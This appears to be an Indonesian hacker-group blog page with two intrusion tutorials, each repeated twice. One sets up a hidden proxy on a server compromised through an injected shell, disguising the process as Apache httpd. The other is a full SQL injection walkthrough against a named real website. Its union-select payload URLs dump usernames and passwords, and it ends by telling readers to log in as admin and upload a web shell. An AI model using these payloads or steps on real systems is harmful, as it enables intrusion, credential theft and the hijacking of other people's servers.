Wooogghh...
Next tutorial cupu.. :D
bagi yg udah jago mending ga usah baca nech tutor, bakar ajah blog ane..
wakakakakakakakakak..
ni ane cm share buat yg masih awam ato masih belajar kek ane.
Okeh, langsung menuju ke Tekape.
==>> Cari folder yang permision 777 (drwxrrwxrwx) dengan menggunakan command
“find / - tipe d -perm 777”
kalo dah ketemu… masuk ke folder tersebut.
==>> Download file proxy.tgz ini dengan menggunakan command “wget
” atau
“lwp-download “.
Kalo masih tetep gak bisa.. dengan terpaksa kamu harus dunlut file proxy.tgz trus upload ke shell inject-an kamu tadi… kalo dah ter download atau upload file proxy.tgz-nya… kamu boleh masuk ke no.3
==>> Extract file proxy td jangan dimasak :P, dengan menggunakan command “tar -zvxf proxy.tgz” nanti akan menghasilkan folder “pro” pada folder yang 777 tadi
==>> masuk ke folder “pro” dengan menggunakan command “cd pro”
==>> Kemudian execute menggunakan command “./xh -s “/usr/local/apache/bin/httpd -DSSL””
==>> Execute sekali lagi menggunakan command “./prox -a -d -p1810” dimana angka pada -p1810 itu digunakan sebagai port… terserah kamu buat port brapa.. yang penting jangan menggunakan kepala angka 0 ex: 0932 atau apalah.. kalo bisa kamu lihat hasil nomor hari ini di www.totobet.net hari ini… heuheuehue
==>> Sukses
Nah..
Untuk menggunakan proxy tersebut… dimana dns website itu sebagai nomor proxy… dan nomor togel yang di -p1810 itu, itu adalah nomor port…
Nb : jika file poxy.tgz sudah mati, hubungi pos satpam terdekat. =)) =))
Baca Selengkapnya..
Next tutorial cupu.. :D
bagi yg udah jago mending ga usah baca nech tutor, bakar ajah blog ane..
wakakakakakakakakak..
ni ane cm share buat yg masih awam ato masih belajar kek ane.
Okeh, langsung menuju ke Tekape.
==>> Cari folder yang permision 777 (drwxrrwxrwx) dengan menggunakan command
“find / - tipe d -perm 777”
kalo dah ketemu… masuk ke folder tersebut.
==>> Download file proxy.tgz ini dengan menggunakan command “wget
” atau
“lwp-download “.
Kalo masih tetep gak bisa.. dengan terpaksa kamu harus dunlut file proxy.tgz trus upload ke shell inject-an kamu tadi… kalo dah ter download atau upload file proxy.tgz-nya… kamu boleh masuk ke no.3
==>> Extract file proxy td jangan dimasak :P, dengan menggunakan command “tar -zvxf proxy.tgz” nanti akan menghasilkan folder “pro” pada folder yang 777 tadi
==>> masuk ke folder “pro” dengan menggunakan command “cd pro”
==>> Kemudian execute menggunakan command “./xh -s “/usr/local/apache/bin/httpd -DSSL””
==>> Execute sekali lagi menggunakan command “./prox -a -d -p1810” dimana angka pada -p1810 itu digunakan sebagai port… terserah kamu buat port brapa.. yang penting jangan menggunakan kepala angka 0 ex: 0932 atau apalah.. kalo bisa kamu lihat hasil nomor hari ini di www.totobet.net hari ini… heuheuehue
==>> Sukses
Nah..
Untuk menggunakan proxy tersebut… dimana dns website itu sebagai nomor proxy… dan nomor togel yang di -p1810 itu, itu adalah nomor port…
Nb : jika file poxy.tgz sudah mati, hubungi pos satpam terdekat. =)) =))
Baca Selengkapnya..
0
komentar
Hollaa.. Ketemu lg ama cowok gantenk sak dunia maya.. :P
Berhubung ada yg minta share tentang SQL Injection..
Wekekekekeke.. :P
Okeh.. Langsung ajjah..
*** Kita tetapkan target terlebih dahulu
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159’
*** Mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
Nah.. Sekarang kita cek satu persatu.
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+2--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+3--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+11--
berarti yang kita ambil adalah sampai angka 4
menjadi http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+10--
*** Untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 11
maka: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,8,9,10--
ok ,yg keluar angka 8
gunakan perintah version() untuk mengecek versi SQL yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,version(),9,10--
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema
*** Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(table_name),9,10+from+information_schema.tables+where+table_schema=database()--
seumpama yg kita cari adalah “admin” , “user” , “tb_user” , dll..
*** Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0x(hexa)-- -> dimasukan setelah angka terakhir
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(column_name),9,10+from+information_schema.columns+where+table_name=0x--
pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
Website yang di gunakan untuk konversi : http://www.string-functions.com/string-hex.aspx
contoh kata yg ingin di konversi yaitu tb-user maka akan menjadi 74625f75736572
*** Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x3a,level),9,10+from+tb_user--
Nah dah nemu ID dan password-nya sekarang.
Very Happy.. smile
ket: 0x3a sama dengan : <- titik dua --->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY... bigsmile
Greetz : JATIMCREW, XCREW, INDONESIAN HACKER TEAM, DEVILZCODE, AND ALL
Special : All Jatimcrews ( Admin, Staff, Moderator, Global Moderator, Spam Guard, And All Member )
Baca Selengkapnya..
Berhubung ada yg minta share tentang SQL Injection..
Wekekekekeke.. :P
Okeh.. Langsung ajjah..
*** Kita tetapkan target terlebih dahulu
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159’
*** Mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
Nah.. Sekarang kita cek satu persatu.
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+2--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+3--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+11--
berarti yang kita ambil adalah sampai angka 4
menjadi http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+10--
*** Untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 11
maka: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,8,9,10--
ok ,yg keluar angka 8
gunakan perintah version() untuk mengecek versi SQL yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,version(),9,10--
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema
*** Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(table_name),9,10+from+information_schema.tables+where+table_schema=database()--
seumpama yg kita cari adalah “admin” , “user” , “tb_user” , dll..
*** Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0x(hexa)-- -> dimasukan setelah angka terakhir
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(column_name),9,10+from+information_schema.columns+where+table_name=0x--
pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
Website yang di gunakan untuk konversi : http://www.string-functions.com/string-hex.aspx
contoh kata yg ingin di konversi yaitu tb-user maka akan menjadi 74625f75736572
*** Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x3a,level),9,10+from+tb_user--
Nah dah nemu ID dan password-nya sekarang.
Very Happy.. smile
ket: 0x3a sama dengan : <- titik dua --->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY... bigsmile
Greetz : JATIMCREW, XCREW, INDONESIAN HACKER TEAM, DEVILZCODE, AND ALL
Special : All Jatimcrews ( Admin, Staff, Moderator, Global Moderator, Spam Guard, And All Member )
Baca Selengkapnya..
Langganan:
Postingan (Atom)
